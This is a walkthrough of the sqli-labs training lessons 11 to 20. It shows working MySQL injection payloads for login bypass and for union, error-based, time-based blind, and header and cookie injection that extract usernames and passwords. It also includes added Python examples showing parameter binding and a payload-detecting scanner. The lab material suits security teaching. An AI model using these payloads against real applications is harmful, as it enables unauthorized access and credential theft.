SQLlabs
Basic-Challenges
Less-11: POST-Error based- Single quotes -String
After Less-10 the lessons move on to POST injection.
This one is straightforward: the universal-password trick logs you in.
username: 1' or 1=1 #   // # is the MySQL comment marker
password: anything
Login succeeds.
Capture the request with Burp Suite.
Determine the number of columns in the SELECT
Inject into the username parameter:
1' order by 2#   ---- no error
1' order by 3#   ---- error: Unknown column '3' in 'order clause'
So the SELECT returns two columns.
Inferred query: select name,passwd from users where name='$name' and passwd='$passwd'
Injection: 1' union select 1,2 #
【Database name and version】
1' union select database(),version() #
【Tables】
1' union select group_concat(table_name),version() from information_schema.tables where table_schema='security' #
【Columns】
1' union select group_concat(column_name),version() from information_schema.columns where table_schema='security' and table_name='users' #
【Usernames and passwords】
1' union select concat_ws(':',username,password),version() from security.users limit 1,1#
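As an added example, not from the original writeup: the Less-11 login query rebuilt in Python with sqlite3 (an in-memory stand-in for the lab's MySQL users table) next to a parameter-bound version, showing why the universal password works against string concatenation and fails against bound parameters. sqlite3 uses -- for comments where the lab's MySQL payloads use #, so the payload is adjusted; the table and its rows are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the lab's security.users table
    # (not the sqli-labs schema; sqlite3 so the example runs offline).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Dumb", "Dumb"), ("admin", "admin")])
    return conn


def login_vulnerable(conn, username, password):
    # Mirrors the Less-11 query built by interpolating the POST fields:
    # the quote in the payload closes the literal and the rest is SQL.
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    # Same query with bound parameters: the input is always data,
    # so a quote or comment marker never reaches the SQL parser as syntax.
    sql = ("SELECT username, password FROM users "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Universal password from the writeup; "--" replaces MySQL's "#" in sqlite.
    payload = "1' or 1=1 -- "
    print(login_vulnerable(db, payload, "anything"))  # first row: bypassed
    print(login_safe(db, payload, "anything"))        # None: rejected
    print(login_safe(db, "admin", "admin"))           # ('admin', 'admin')
```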
Less-12: POST-Error based- Double quotes -String
A single quote in the username does nothing; a double quote gives:
near '"admin"") and password=("") LIMIT 0,1' at line 1
"admin"") and password=("") LIMIT 0,1
The SQL statement is closed with double quotes and parentheses.
【Database and version】
") union select database(),version() #
Less-13: POST-Double Injection- Single quotes -String-twist
Test:
username:admin'
password:
The SQL statement is closed with a single quote and parentheses,
so the injection is:
username:') or 1=1 #
password:123
Login succeeds.
A successful login does not display the username or password, but a SQL error message is displayed,
so error-based injection is the way to go.
【Get table name】
1') union select 1,count(*) from information_schema.tables group by concat('{ ',(select database()),' }', floor(rand(0)*2)) #
Less-14: POST-Double Injection- Double quotes -String-twist
Similar to Less-13, but closed with double quotes:
1" union select 1,count(*) from information_schema.tables group by concat('{ ',(select database()),' }', floor(rand(0)*2)) #
Less-15: POST-Blind-Boolian/time Based - Single quotes
Test:
admin' or 1=1 #
Login succeeds.
No matter which special characters are injected, the page only shows a login failure, with no error message,
but the universal password still logs in.
So consider time-based blind injection:
admin' and sleep(5) #   // response delayed by 5s
Determine the length of the current database name:
admin' and if(length(database())>0,sleep(5),0) #
admin' and if(length(database())=8,sleep(5),0) #
Other statements:
admin' and if(ascii(substr(database(),1,1))>114,sleep(5),0) #
admin' and if(ascii(substr(database(),1,1))=115,sleep(5),0) #
...
admin' and if((select length(username) from security.users limit 0,1)>3,sleep(5),0) #
Less-16: POST-Blind-Boolian/time Based - Double quotes
Closed with double quotes and parentheses:
admin") or 1=1 #
Less-17: POST-Update Query-Error Based - Single
This is a password reset page.
[PASSWORD RESET]
username:123
new password :123'
No error message.
username:admin   (an error only appears when the username exists)
new password :123'
username:admin
new password :123'#   (comment)
So the backend SQL statement is closed with a single quote.
Inferred SQL statement: UPDATE users SET password = '$password' WHERE username='$username'
Error-based SQL injection:
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select database()),'}',FLOOR(RAND(0)*2))) #
// injection succeeds; the current database is security
The rest is routine.
【Tables】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'}',FLOOR(RAND(0)*2))) #
【Columns】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),'}',FLOOR(RAND(0)*2))) #
【Field contents】
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select concat_ws(':',username,password) from security.users limit 0,1),'}',FLOOR(RAND(0)*2))) #
【There is a problem here: You can't specify target table 'users' for update in FROM clause】 The users table being updated cannot also be read directly in the subquery.
Modify the statement slightly (wrap the subquery in a derived table):
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat('{',(select * from (select concat_ws(':',username,password) from security.users limit 0,1) as temp),'}',FLOOR(RAND(0)*2))) #
Here is another error-based injection method:
updatexml injection
【Reference: https://www.jb51.net/article/125599.htm
http://www.mamicode.com/info-detail-1665678.html】
PS: this injection exploits the format of the function's second argument (an XPath string); if the string is not valid XPath, an error is raised.
First, the updatexml() function:
UPDATEXML (XML_document, XPath_string, new_value);
First argument: XML_document, a string, the name of the XML document object (Doc in the reference).
Second argument: XPath_string, a string in XPath format; look up an XPath tutorial if you are unfamiliar with the syntax.
Third argument: new_value, a string that replaces the matched data.
Purpose: changes the value of the matching nodes in the document,
i.e. replaces the parts of XML_document matched by XPath_string.
Injection statements:
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #
uname=admin&passwd=123' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema='security')),0x7e),1) #
Less-18: POST-Header Injection-Uagent field-Error Based
Test: logging in with admin:admin succeeds and displays the User-Agent.
This time the injection point is the HTTP header, specifically the User-Agent field.
Login failure -------- shows the IP address and a login-failed message
Login success -------- shows the IP address, the User-Agent header and a login-succeeded message
Edit the header (the correct credentials admin:admin are needed here).
An error is returned.
It appears the IP and User-Agent are inserted into the database.
SQL statement: INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
Since errors are echoed back, use error-based injection.
The resulting SQL statement 【note the parenthesis balancing】:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('aaa',(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))) #', '127.0.0.1', 'admin')
That is:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('aaa',(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)))
【Tables】
aaa',(updatexml(1,concat(0x7e,(SELECT group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))) #
【Columns】
aaa',(updatexml(1,concat(0x7e,(SELECT group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))) #
【Field contents】
aaa',(updatexml(1,concat(0x7e,(SELECT concat_ws(':',username,password) from security.users limit 0,1),0x7e),1))) #
Less-19: POST-Header Injection-Referer field-Error Based
Same method as Less-18, but the injection point is the Referer.
Use a single quote to trigger the error.
Less-20: POST-Cookie Injection-Uagent field-Error Based
Enter the correct username and password.
Start capturing and refresh the page.
Add a single quote in the cookie field.
The page errors: near ''admin'' LIMIT 0,1' at line 1
So the SQL statement is closed with a single quote.
Close it with a single quote and use error-based injection:
Cookie: uname=admin' and (updatexml(1,concat(0x7e,(select @@version),0x7e),1))#
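As an added defender-side example (not from the original writeup), a small Python scanner that flags the payload shapes used in Less-15 through Less-20 across the fields this page shows carrying SQL: POST parameters, User-Agent, Referer and Cookie. The sample requests are constructed for this example, and the signature set is an assumption covering only the techniques on this page, not a complete rule set.

```python
import re

# Signatures modelled on the payload shapes in this writeup (assumed set):
# time-based (sleep), error-based (updatexml / floor(rand(0)*2)),
# union-based, information_schema probing and a trailing comment marker.
SIGNATURES = {
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
    "error_based": re.compile(
        r"\b(updatexml|extractvalue)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "union_based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
    "comment_tail": re.compile(r"(#|--\s|/\*)\s*$"),
}


def scan_request(request):
    """Return (field, signature) pairs for every field value that matches.

    `request` maps a field name (POST parameter or header) to its raw value,
    so body fields and the User-Agent / Referer / Cookie headers from
    Less-18 to Less-20 are checked the same way.
    """
    hits = []
    for field, value in request.items():
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((field, name))
    return hits


# Constructed sample requests based on the lessons above (not real traffic).
SAMPLES = [
    {"uname": "admin' and if(length(database())=8,sleep(5),0) #", "passwd": "x"},
    {"uname": "admin", "passwd": "admin",
     "User-Agent": "aaa',(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))) #"},
    {"Cookie": "uname=admin' and (updatexml(1,concat(0x7e,(select @@version),0x7e),1))#"},
    {"uname": "admin", "passwd": "admin", "User-Agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(scan_request(req) or "clean")
```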
Less-21 & Less-22
Covered under Advanced Injection.